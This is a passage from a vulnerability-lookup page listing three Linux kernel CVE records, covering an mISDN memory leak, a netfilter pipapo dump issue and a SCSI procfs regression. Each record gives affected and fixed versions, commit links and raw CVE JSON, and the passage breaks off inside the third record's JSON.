Vulnerability-Lookup

Vendor	Product	Description
Ubuntu	N/A	Ubuntu 22.04 LTS
Ubuntu	N/A	Ubuntu 18.04 ESM
Ubuntu	N/A	Ubuntu 24.04 LTS
Ubuntu	N/A	Ubuntu 20.04 LTS

CVE-2022-48863 (GCVE-0-2022-48863)

Vulnerability from cvelistv5 – Published: 2024-07-16 12:25 – Updated: 2025-05-04 08:24

Title

mISDN: Fix memory leak in dsp_pipeline_build()

Summary

In the Linux kernel, the following vulnerability has been resolved: mISDN: Fix memory leak in dsp_pipeline_build() dsp_pipeline_build() allocates dup pointer by kstrdup(cfg), but then it updates dup variable by strsep(&dup, "|"). As a result when it calls kfree(dup), the dup variable contains NULL. Found by Linux Driver Verification project (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a3d5fcc6cf2ecbba5…
	https://git.kernel.org/stable/c/7777b1f795af1bb43…
	https://git.kernel.org/stable/c/640445d6fc059d451…
	https://git.kernel.org/stable/c/c6a502c2299941c83…

Impacted products

Vendor

Product

Version

Linux

Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < a3d5fcc6cf2ecbba5a269631092570aa285a24cb (git)
Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < 7777b1f795af1bb43867375d8a776080111aae1b (git)
Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < 640445d6fc059d4514ffea79eb4196299e0e2d0f (git)
Affected: 960366cf8dbb3359afaca30cf7fdbf69a6d6dda7 , < c6a502c2299941c8326d029cfc8a3bc8a4607ad5 (git)

Linux

Affected: 2.6.27
Unaffected: 0 , < 2.6.27 (semver)
Unaffected: 5.10.106 , ≤ 5.10.* (semver)
Unaffected: 5.15.29 , ≤ 5.15.* (semver)
Unaffected: 5.16.15 , ≤ 5.16.* (semver)
Unaffected: 5.17 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T15:25:01.685Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a3d5fcc6cf2ecbba5a269631092570aa285a24cb"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7777b1f795af1bb43867375d8a776080111aae1b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/640445d6fc059d4514ffea79eb4196299e0e2d0f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c6a502c2299941c8326d029cfc8a3bc8a4607ad5"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2022-48863",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:25:25.668277Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:07.200Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/isdn/mISDN/dsp_pipeline.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a3d5fcc6cf2ecbba5a269631092570aa285a24cb",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            },
            {
              "lessThan": "7777b1f795af1bb43867375d8a776080111aae1b",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            },
            {
              "lessThan": "640445d6fc059d4514ffea79eb4196299e0e2d0f",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            },
            {
              "lessThan": "c6a502c2299941c8326d029cfc8a3bc8a4607ad5",
              "status": "affected",
              "version": "960366cf8dbb3359afaca30cf7fdbf69a6d6dda7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/isdn/mISDN/dsp_pipeline.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.27"
            },
            {
              "lessThan": "2.6.27",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.106",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.29",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.16.*",
              "status": "unaffected",
              "version": "5.16.15",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "5.17",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.106",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.29",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.16.15",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.17",
                  "versionStartIncluding": "2.6.27",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmISDN: Fix memory leak in dsp_pipeline_build()\n\ndsp_pipeline_build() allocates dup pointer by kstrdup(cfg),\nbut then it updates dup variable by strsep(\u0026dup, \"|\").\nAs a result when it calls kfree(dup), the dup variable contains NULL.\n\nFound by Linux Driver Verification project (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:24:57.485Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a3d5fcc6cf2ecbba5a269631092570aa285a24cb"
        },
        {
          "url": "https://git.kernel.org/stable/c/7777b1f795af1bb43867375d8a776080111aae1b"
        },
        {
          "url": "https://git.kernel.org/stable/c/640445d6fc059d4514ffea79eb4196299e0e2d0f"
        },
        {
          "url": "https://git.kernel.org/stable/c/c6a502c2299941c8326d029cfc8a3bc8a4607ad5"
        }
      ],
      "title": "mISDN: Fix memory leak in dsp_pipeline_build()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2022-48863",
    "datePublished": "2024-07-16T12:25:26.482Z",
    "dateReserved": "2024-07-16T11:38:08.920Z",
    "dateUpdated": "2025-05-04T08:24:57.485Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-27017 (GCVE-0-2024-27017)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:30 – Updated: 2025-11-04 17:17

Title

netfilter: nft_set_pipapo: walk over current view on netlink dump

Summary

In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: walk over current view on netlink dump The generation mask can be updated while netlink dump is in progress. The pipapo set backend walk iterator cannot rely on it to infer what view of the datastructure is to be used. Add notation to specify if user wants to read/update the set. Based on patch from Florian Westphal.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/ff89db14c63a82706…
	https://git.kernel.org/stable/c/ce9fef54c5ec9912a…
	https://git.kernel.org/stable/c/52735a010f37580b3…
	https://git.kernel.org/stable/c/f24d8abc2bb8cbf31…
	https://git.kernel.org/stable/c/721715655c7264056…
	https://git.kernel.org/stable/c/29b359cf6d95fd607…

Impacted products

Vendor

Product

Version

Linux

Affected: 2a90da8e0dd50f42e577988f4219f4f4cd3616b7 , < ff89db14c63a827066446460e39226c0688ef786 (git)
Affected: 45eb6944d0f55102229115de040ef3a48841434a , < ce9fef54c5ec9912a0c9a47bac3195cc41b14679 (git)
Affected: 0d836f917520300a8725a5dbdad4406438d0cead , < 52735a010f37580b3a569a996f878fdd87425650 (git)
Affected: 2b84e215f87443c74ac0aa7f76bb172d43a87033 , < f24d8abc2bb8cbf31ec713336e402eafa8f42f60 (git)
Affected: 2b84e215f87443c74ac0aa7f76bb172d43a87033 , < 721715655c72640567e8742567520c99801148ed (git)
Affected: 2b84e215f87443c74ac0aa7f76bb172d43a87033 , < 29b359cf6d95fd60730533f7f10464e95bd17c73 (git)
Affected: f661383b5f1aaac3fe121b91e04332944bc90193 (git)

Linux

Affected: 6.4
Unaffected: 0 , < 6.4 (semver)
Unaffected: 5.10.227 , ≤ 5.10.* (semver)
Unaffected: 5.15.168 , ≤ 5.15.* (semver)
Unaffected: 6.1.112 , ≤ 6.1.* (semver)
Unaffected: 6.6.53 , ≤ 6.6.* (semver)
Unaffected: 6.8.8 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-27017",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T16:20:37.656440Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:47:29.908Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-04T17:17:24.217Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/721715655c72640567e8742567520c99801148ed"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/29b359cf6d95fd60730533f7f10464e95bd17c73"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/03/msg00002.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
          },
          {
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "include/net/netfilter/nf_tables.h",
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_pipapo.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "ff89db14c63a827066446460e39226c0688ef786",
              "status": "affected",
              "version": "2a90da8e0dd50f42e577988f4219f4f4cd3616b7",
              "versionType": "git"
            },
            {
              "lessThan": "ce9fef54c5ec9912a0c9a47bac3195cc41b14679",
              "status": "affected",
              "version": "45eb6944d0f55102229115de040ef3a48841434a",
              "versionType": "git"
            },
            {
              "lessThan": "52735a010f37580b3a569a996f878fdd87425650",
              "status": "affected",
              "version": "0d836f917520300a8725a5dbdad4406438d0cead",
              "versionType": "git"
            },
            {
              "lessThan": "f24d8abc2bb8cbf31ec713336e402eafa8f42f60",
              "status": "affected",
              "version": "2b84e215f87443c74ac0aa7f76bb172d43a87033",
              "versionType": "git"
            },
            {
              "lessThan": "721715655c72640567e8742567520c99801148ed",
              "status": "affected",
              "version": "2b84e215f87443c74ac0aa7f76bb172d43a87033",
              "versionType": "git"
            },
            {
              "lessThan": "29b359cf6d95fd60730533f7f10464e95bd17c73",
              "status": "affected",
              "version": "2b84e215f87443c74ac0aa7f76bb172d43a87033",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "f661383b5f1aaac3fe121b91e04332944bc90193",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "include/net/netfilter/nf_tables.h",
            "net/netfilter/nf_tables_api.c",
            "net/netfilter/nft_set_pipapo.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.4"
            },
            {
              "lessThan": "6.4",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.227",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.168",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.112",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.53",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.227",
                  "versionStartIncluding": "5.10.186",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.168",
                  "versionStartIncluding": "5.15.119",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.112",
                  "versionStartIncluding": "6.1.36",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.53",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.8",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_pipapo: walk over current view on netlink dump\n\nThe generation mask can be updated while netlink dump is in progress.\nThe pipapo set backend walk iterator cannot rely on it to infer what\nview of the datastructure is to be used. Add notation to specify if user\nwants to read/update the set.\n\nBased on patch from Florian Westphal."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:55:22.853Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/ff89db14c63a827066446460e39226c0688ef786"
        },
        {
          "url": "https://git.kernel.org/stable/c/ce9fef54c5ec9912a0c9a47bac3195cc41b14679"
        },
        {
          "url": "https://git.kernel.org/stable/c/52735a010f37580b3a569a996f878fdd87425650"
        },
        {
          "url": "https://git.kernel.org/stable/c/f24d8abc2bb8cbf31ec713336e402eafa8f42f60"
        },
        {
          "url": "https://git.kernel.org/stable/c/721715655c72640567e8742567520c99801148ed"
        },
        {
          "url": "https://git.kernel.org/stable/c/29b359cf6d95fd60730533f7f10464e95bd17c73"
        }
      ],
      "title": "netfilter: nft_set_pipapo: walk over current view on netlink dump",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-27017",
    "datePublished": "2024-05-01T05:30:01.888Z",
    "dateReserved": "2024-02-19T14:20:24.209Z",
    "dateUpdated": "2025-11-04T17:17:24.217Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26935 (GCVE-0-2024-26935)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:17 – Updated: 2025-05-04 12:55

Title

scsi: core: Fix unremoved procfs host directory regression

Summary

In the Linux kernel, the following vulnerability has been resolved: scsi: core: Fix unremoved procfs host directory regression Commit fc663711b944 ("scsi: core: Remove the /proc/scsi/${proc_name} directory earlier") fixed a bug related to modules loading/unloading, by adding a call to scsi_proc_hostdir_rm() on scsi_remove_host(). But that led to a potential duplicate call to the hostdir_rm() routine, since it's also called from scsi_host_dev_release(). That triggered a regression report, which was then fixed by commit be03df3d4bfe ("scsi: core: Fix a procfs host directory removal regression"). The fix just dropped the hostdir_rm() call from dev_release(). But it happens that this proc directory is created on scsi_host_alloc(), and that function "pairs" with scsi_host_dev_release(), while scsi_remove_host() pairs with scsi_add_host(). In other words, it seems the reason for removing the proc directory on dev_release() was meant to cover cases in which a SCSI host structure was allocated, but the call to scsi_add_host() didn't happen. And that pattern happens to exist in some error paths, for example. Syzkaller causes that by using USB raw gadget device, error'ing on usb-storage driver, at usb_stor_probe2(). By checking that path, we can see that the BadDevice label leads to a scsi_host_put() after a SCSI host allocation, but there's no call to scsi_add_host() in such path. That leads to messages like this in dmesg (and a leak of the SCSI host proc structure): usb-storage 4-1:87.51: USB Mass Storage device detected proc_dir_entry 'scsi/usb-storage' already registered WARNING: CPU: 1 PID: 3519 at fs/proc/generic.c:377 proc_register+0x347/0x4e0 fs/proc/generic.c:376 The proper fix seems to still call scsi_proc_hostdir_rm() on dev_release(), but guard that with the state check for SHOST_CREATED; there is even a comment in scsi_host_dev_release() detailing that: such conditional is meant for cases where the SCSI host was allocated but there was no calls to {add,remove}_host(), like the usb-storage case. This is what we propose here and with that, the error path of usb-storage does not trigger the warning anymore.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/0053f15d50d50c931…
	https://git.kernel.org/stable/c/5c2386ba80e779a92…
	https://git.kernel.org/stable/c/cea234bb214b17d00…
	https://git.kernel.org/stable/c/3678cf67ff7136db1…
	https://git.kernel.org/stable/c/d4c34782b6d7b1e68…
	https://git.kernel.org/stable/c/e293c773c13b830cd…
	https://git.kernel.org/stable/c/f4ff08fab66eb5c0b…
	https://git.kernel.org/stable/c/f23a4d6e07570826f…

Impacted products

Vendor

Product

Version

Linux

Affected: 88c3d3bb6469cea929ac68fd326bdcbefcdfdd83 , < 0053f15d50d50c9312d8ab9c11e2e405812dfcac (git)
Affected: 68c665bb185037e7eb66fb792c61da9d7151e99c , < 5c2386ba80e779a92ec3bb64ccadbedd88f779b1 (git)
Affected: 2a764d55e938743efa7c2cba7305633bcf227f09 , < cea234bb214b17d004dfdccce4491e6ff57c96ee (git)
Affected: 7e0ae8667fcdd99d1756922e1140cac75f5fa279 , < 3678cf67ff7136db1dd3bf63c361650db5d92889 (git)
Affected: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f , < d4c34782b6d7b1e68d18d9549451b19433bd4c6c (git)
Affected: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f , < e293c773c13b830cdc251f155df2254981abc320 (git)
Affected: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f , < f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7 (git)
Affected: be03df3d4bfe7e8866d4aa43d62e648ffe884f5f , < f23a4d6e07570826fe95023ca1aa96a011fa9f84 (git)
Affected: 73f030d4ef6d1ad17f824a0a2eb637ef7a9c7d51 (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26935",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T14:41:52.902192Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T14:42:04.057Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.717Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0053f15d50d50c9312d8ab9c11e2e405812dfcac"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5c2386ba80e779a92ec3bb64ccadbedd88f779b1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cea234bb214b17d004dfdccce4491e6ff57c96ee"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3678cf67ff7136db1dd3bf63c361650db5d92889"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d4c34782b6d7b1e68d18d9549451b19433bd4c6c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e293c773c13b830cdc251f155df2254981abc320"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f23a4d6e07570826fe95023ca1aa96a011fa9f84"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/hosts.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "0053f15d50d50c9312d8ab9c11e2e405812dfcac",
              "status": "affected",
              "version": "88c3d3bb6469cea929ac68fd326bdcbefcdfdd83",
              "versionType": "git"
            },
            {
              "lessThan": "5c2386ba80e779a92ec3bb64ccadbedd88f779b1",
              "status": "affected",
              "version": "68c665bb185037e7eb66fb792c61da9d7151e99c",
              "versionType": "git"
            },
            {
              "lessThan": "cea234bb214b17d004dfdccce4491e6ff57c96ee",
              "status": "affected",
              "version": "2a764d55e938743efa7c2cba7305633bcf227f09",
              "versionType": "git"
            },
            {
              "lessThan": "3678cf67ff7136db1dd3bf63c361650db5d92889",
              "status": "affected",
              "version": "7e0ae8667fcdd99d1756922e1140cac75f5fa279",
              "versionType": "git"
            },
            {
              "lessThan": "d4c34782b6d7b1e68d18d9549451b19433bd4c6c",
              "status": "affected",
              "version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
              "versionType": "git"
            },
            {
              "lessThan": "e293c773c13b830cdc251f155df2254981abc320",
              "status": "affected",
              "version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
              "versionType": "git"
            },
            {
              "lessThan": "f4ff08fab66eb5c0b97e1a24edac052fb40bf5d7",
              "status": "affected",
              "version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
              "versionType": "git"
            },
            {
              "lessThan": "f23a4d6e07570826fe95023ca1aa96a011fa9f84",
              "status": "affected",
              "version": "be03df3d4bfe7e8866d4aa43d62e648ffe884f5f",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "73f030d4ef6d1ad17f824a0a2eb637ef7a9c7d51",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/scsi/hosts.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "5.4.238",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10.176",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.15.104",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "6.1.21",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "6.2.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
